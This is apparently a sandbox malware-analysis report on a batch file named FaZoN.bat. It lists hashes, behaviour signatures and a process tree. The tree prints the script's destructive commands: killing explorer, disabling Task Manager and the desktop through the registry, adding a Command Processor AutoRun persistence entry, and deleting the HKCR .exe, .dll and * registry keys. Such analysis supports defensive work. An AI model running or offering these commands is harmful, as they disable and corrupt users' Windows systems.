Analysis

  • max time kernel
    45s
  • max time network
    192s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-03-2024 20:26

General

  • Target

    TrashMalwares-main/FaZoN.bat

  • Size

    1KB

  • MD5

    2a2c2cca38f2e34ee666d4534834dcbb

  • SHA1

    8ffa496f4e56c6406f8f965059483125966c6fdd

  • SHA256

    6397c16efa9b0ff4732002d37a948192b1df49c0c2c927806622fa59d3ac1b46

  • SHA512

    e05a896d8bcad42c04b69c14be3b625d1f586049b2a5925d08bae47f47429b44669904e22daaf94c003bbd697957bddf6067e1aaccc9dd4cb7c607a1d78686d0

Score
8/10

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Modifies Installed Components in the registry 2 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 8 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Windows\system32\msg.exe
      msg * Gosha created by GGmex your computer infected
      2⤵
        PID:3600
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im explorer.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2876
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f
        2⤵
        • Modifies registry key
        PID:1720
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:624
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:4636
      • C:\Windows\explorer.exe
        explorer.exe
        2⤵
        • Modifies Installed Components in the registry
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3552
      • C:\Windows\system32\msg.exe
        msg * Your desktop has been crashed
        2⤵
          PID:3536
        • C:\Windows\system32\reg.exe
          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          2⤵
          • Modifies registry key
          PID:2620
        • C:\Windows\system32\msg.exe
          msg * Your windows infected by gosha :)
          2⤵
            PID:2940
          • C:\Windows\system32\reg.exe
            reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\gosha.bat" /f
            2⤵
              PID:3904
            • C:\Windows\system32\msg.exe
              msg * Deleted files
              2⤵
                PID:2024
              • C:\Windows\system32\msg.exe
                msg * Your system has been removed...
                2⤵
                  PID:1004
                • C:\Windows\system32\msg.exe
                  msg * Click OK
                  2⤵
                    PID:1656
                  • C:\Windows\system32\cmd.exe
                    cmd
                    2⤵
                      PID:2628
                    • C:\Windows\system32\reg.exe
                      reg delete HKCR/.exe
                      2⤵
                        PID:1976
                      • C:\Windows\system32\reg.exe
                        reg delete HKCR/.dll
                        2⤵
                          PID:3864
                        • C:\Windows\system32\reg.exe
                          reg delete HKCR/*
                          2⤵
                            PID:4852
                          • C:\Windows\system32\cmd.exe
                            cmd
                            2⤵
                              PID:776
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:2796
                          • C:\Windows\explorer.exe
                            explorer.exe
                            1⤵
                            • Modifies Installed Components in the registry
                            • Checks SCSI registry key(s)
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:2728
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:1556
                          • C:\Windows\explorer.exe
                            explorer.exe
                            1⤵
                            • Modifies Installed Components in the registry
                            • Enumerates connected drives
                            • Checks SCSI registry key(s)
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:2228
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:444
                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                            1⤵
                            • Modifies Internet Explorer settings
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:3384
                          • C:\Windows\explorer.exe
                            explorer.exe
                            1⤵
                            • Modifies Installed Components in the registry
                            • Checks SCSI registry key(s)
                            • Modifies registry class
                            • Suspicious use of SendNotifyMessage
                            PID:3316
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:4164
                          • C:\Windows\explorer.exe
                            explorer.exe
                            1⤵
                            • Modifies Installed Components in the registry
                            • Enumerates connected drives
                            • Checks SCSI registry key(s)
                            • Modifies registry class
                            • Suspicious use of SendNotifyMessage
                            PID:3568
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:468
                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                            1⤵
                            • Modifies Internet Explorer settings
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:2264
                          • C:\Windows\explorer.exe
                            explorer.exe
                            1⤵
                            • Modifies Installed Components in the registry
                            • Enumerates connected drives
                            • Checks SCSI registry key(s)
                            • Modifies registry class
                            PID:3920
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:3804
                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                            1⤵
                            • Modifies Internet Explorer settings
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:1556
                          • C:\Windows\explorer.exe
                            explorer.exe
                            1⤵
                            • Modifies Installed Components in the registry
                            • Checks SCSI registry key(s)
                            • Modifies registry class
                            PID:3404
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:3396
                          • C:\Windows\explorer.exe
                            explorer.exe
                            1⤵
                            • Modifies Installed Components in the registry
                            • Enumerates connected drives
                            • Checks SCSI registry key(s)
                            • Modifies registry class
                            PID:4396
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:2796
                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                            1⤵
                            • Modifies Internet Explorer settings
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:3616
                          • C:\Windows\explorer.exe
                            explorer.exe
                            1⤵
                            • Modifies Installed Components in the registry
                            • Checks SCSI registry key(s)
                            • Modifies registry class
                            PID:2516
                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                            1⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:3980
                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                            1⤵
                            • Modifies registry class
                            • Suspicious use of SetWindowsHookEx
                            PID:3632
                          • C:\Windows\explorer.exe
                            explorer.exe
                            1⤵
                              PID:684
                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                              1⤵
                                PID:3660
                              • C:\Windows\explorer.exe
                                explorer.exe
                                1⤵
                                  PID:3668
                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                  1⤵
                                    PID:3396
                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                    1⤵
                                      PID:4332
                                    • C:\Windows\explorer.exe
                                      explorer.exe
                                      1⤵
                                        PID:3804
                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                        1⤵
                                          PID:3316
                                        • C:\Windows\explorer.exe
                                          explorer.exe
                                          1⤵
                                            PID:1196
                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                            1⤵
                                              PID:4564
                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                              1⤵
                                                PID:3616
                                              • C:\Windows\explorer.exe
                                                explorer.exe
                                                1⤵
                                                  PID:4452
                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                  1⤵
                                                    PID:3972
                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                    1⤵
                                                      PID:4852
                                                    • C:\Windows\explorer.exe
                                                      explorer.exe
                                                      1⤵
                                                        PID:3480
                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                        1⤵
                                                          PID:3416
                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                          1⤵
                                                            PID:4472
                                                          • C:\Windows\explorer.exe
                                                            explorer.exe
                                                            1⤵
                                                              PID:3112
                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                              1⤵
                                                                PID:4496
                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                1⤵
                                                                  PID:1520
                                                                • C:\Windows\explorer.exe
                                                                  explorer.exe
                                                                  1⤵
                                                                    PID:3932
                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                    1⤵
                                                                      PID:3360
                                                                    • C:\Windows\explorer.exe
                                                                      explorer.exe
                                                                      1⤵
                                                                        PID:4528
                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                        1⤵
                                                                          PID:2552
                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                          1⤵
                                                                            PID:5060
                                                                          • C:\Windows\explorer.exe
                                                                            explorer.exe
                                                                            1⤵
                                                                              PID:3448
                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                              1⤵
                                                                                PID:3536
                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                1⤵
                                                                                  PID:4436
                                                                                • C:\Windows\explorer.exe
                                                                                  explorer.exe
                                                                                  1⤵
                                                                                    PID:2440
                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                    1⤵
                                                                                      PID:3480
                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                      1⤵
                                                                                        PID:3800
                                                                                      • C:\Windows\explorer.exe
                                                                                        explorer.exe
                                                                                        1⤵
                                                                                          PID:3572
                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                          1⤵
                                                                                            PID:4564
                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                            1⤵
                                                                                              PID:2924
                                                                                            • C:\Windows\explorer.exe
                                                                                              explorer.exe
                                                                                              1⤵
                                                                                                PID:1448
                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                1⤵
                                                                                                  PID:1284
                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                  1⤵
                                                                                                    PID:3292
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    explorer.exe
                                                                                                    1⤵
                                                                                                      PID:392
                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                      1⤵
                                                                                                        PID:4144
                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                        1⤵
                                                                                                          PID:4436
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          explorer.exe
                                                                                                          1⤵
                                                                                                            PID:1460
                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                            1⤵
                                                                                                              PID:1512
                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                              1⤵
                                                                                                                PID:3760
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:220
                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                  1⤵
                                                                                                                    PID:5044
                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                    1⤵
                                                                                                                      PID:4664
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:4224
                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                        1⤵
                                                                                                                          PID:4440
                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                          1⤵
                                                                                                                            PID:1172
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:4052
                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                              1⤵
                                                                                                                                PID:4232
                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                1⤵
                                                                                                                                  PID:2316
                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                  explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:4836
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                    1⤵
                                                                                                                                      PID:4488
                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                      explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:2400
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                        1⤵
                                                                                                                                          PID:2688
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                          1⤵
                                                                                                                                            PID:1536
                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                            explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:4292
                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                              1⤵
                                                                                                                                                PID:4876
                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                1⤵
                                                                                                                                                  PID:4776

                                                                                                                                                Network

                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                Replay Monitor

                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                Downloads

                                                                                                                                                • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\KERIKBO1\microsoft.windows[1].xml

                                                                                                                                                  Filesize

                                                                                                                                                  96B

                                                                                                                                                  MD5

                                                                                                                                                  974f0adc8b3b7f482be95139c92926e0

                                                                                                                                                  SHA1

                                                                                                                                                  635f5f7b6f1dda58dd4926f1600dce90652da52a

                                                                                                                                                  SHA256

                                                                                                                                                  fc71f9b009579b4f8c03f646fca98084ed6133d4f2acc4103ea39c366518c771

                                                                                                                                                  SHA512

                                                                                                                                                  27b57eec2e4da0c23cb6f7e173ac831a039c3c8a76dec063c8b23c2e1d90f2d52dc5916044a1cf09fd235439d28919d31e0eef3870374e682d1f07daac9960b2

